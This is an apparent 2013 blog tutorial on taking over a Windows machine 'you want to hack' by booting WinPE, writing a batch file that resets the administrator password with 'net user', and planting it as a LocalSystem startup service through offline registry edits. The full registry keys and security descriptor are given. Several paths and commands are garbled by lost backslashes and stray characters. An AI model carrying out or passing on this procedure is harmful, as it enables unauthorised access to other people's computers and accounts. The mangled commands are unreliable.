Saturday, 29 June 2013


Step 1: Prepare a WinPE Image (download it), and burn it to a USB flash drive or a CD/DVD disc.
Step 2: Boot the computer you want to hack from WinPE live disk.
Step 3: Write a Windows password hack script:

   3.1 Create a file named windows-passwor ­d-hack.bat.
   3.2 Write password hack script: net user administrator 000. Just so much, is it easy? This command will set the    administrator account’s password to 000. If want to hack other user password, add more commands like              this: net user user_name1, new_password1 rn net user user_name2, new_password2 .
Step 4: Copy the hack script file to Windows system32 directory.
Save windows-passwor ­d-hack.bat and copy it to the system32 directory . Here.. copy to C:WindowsSystem ­32. Note: If the system you want to hack is on D: partition, you should copy windows-passwor ­d-hack.bat to D:WindowsSystem ­32.
Step 5: Edit registry to makeWindows run the hack scriptwhen it start up.(shown below)

       5.1 Load SYSTEM to WinPE’sregister, and give it a name system_hack.
       5.2 Add a sub key named windows-passwor ­d-hack to HKEY_LOCAL_MACH ­INEsystem_hacks ­ervices, and add a group key valuesfor it, shown as below:
[HKEY_LOCAL_MAC ­HINEsystem_hack ­ControlSet001Se ­rviceswindows-p ­assword-hack]
"Type"=dword:00 ­000110
"Start"=dword:0 ­0000002
"ErrorControl"= ­dword:00000001
"ImagePath"="wi ­ndows-password- ­hack.bat"
"DisplayName"=" ­windows-passwor ­d-hack"
"ObjectName"="L ­ocalSystem"
[HKEY_LOCAL_MAC ­HINEsystem_hack ­ControlSet001Se ­rviceswindows-p ­assword-hackSec ­urity]
"Security"=hex: ­01,00,14,80,90, ­00,00,00,9c,00, ­00,00,14,00,00, ­00,30,00,00,00, ­02,
00,1c,00,01,00, ­00,00,02,80,14, ­00,ff,01,0f,00, ­01,01,00,00,00, ­00,00,01,00,00,
00,00,02,00,60, ­00,04,00,00,00, ­00,00,14,00,fd, ­01,02,00,01,01, ­00,00,00,00,00,
05,12,00,00,00, ­00,00,18,00,ff, ­01,0f,00,01,02, ­00,00,00,00,00, ­05,20,00,00,00,
20,02,00,00,00, ­00,14,00,8d,01, ­02,00,01,01,00, ­00,00,00,00,05, ­0b,00,00,00,00,
00,18,00,fd,01, ­02,00,01,02,00, ­00,00,00,00,05, ­20,00,00,00,23, ­02,00,00,01,01,
00,00,00,00,00, ­05,12,00,00,00, ­01,01,00,00,00, ­00,00,05,12,00, ­00,00
[HKEY_LOCAL_MAC ­HINEsystem_hack ­ControlSet001Se ­rviceswindows-p ­assword-hackEnu ­m]
"Count"=dword:0 ­0000001
"NextInstance"= ­dword:00000001
5.3 Unload system_hack fromWinPE’s register.
Google How to edit Windows registry offline for more detail.
Step 6: Restart computer and login Administrator account with new password.
After login windows, you canopen the register, and delete the windows-passwor­d-hack key.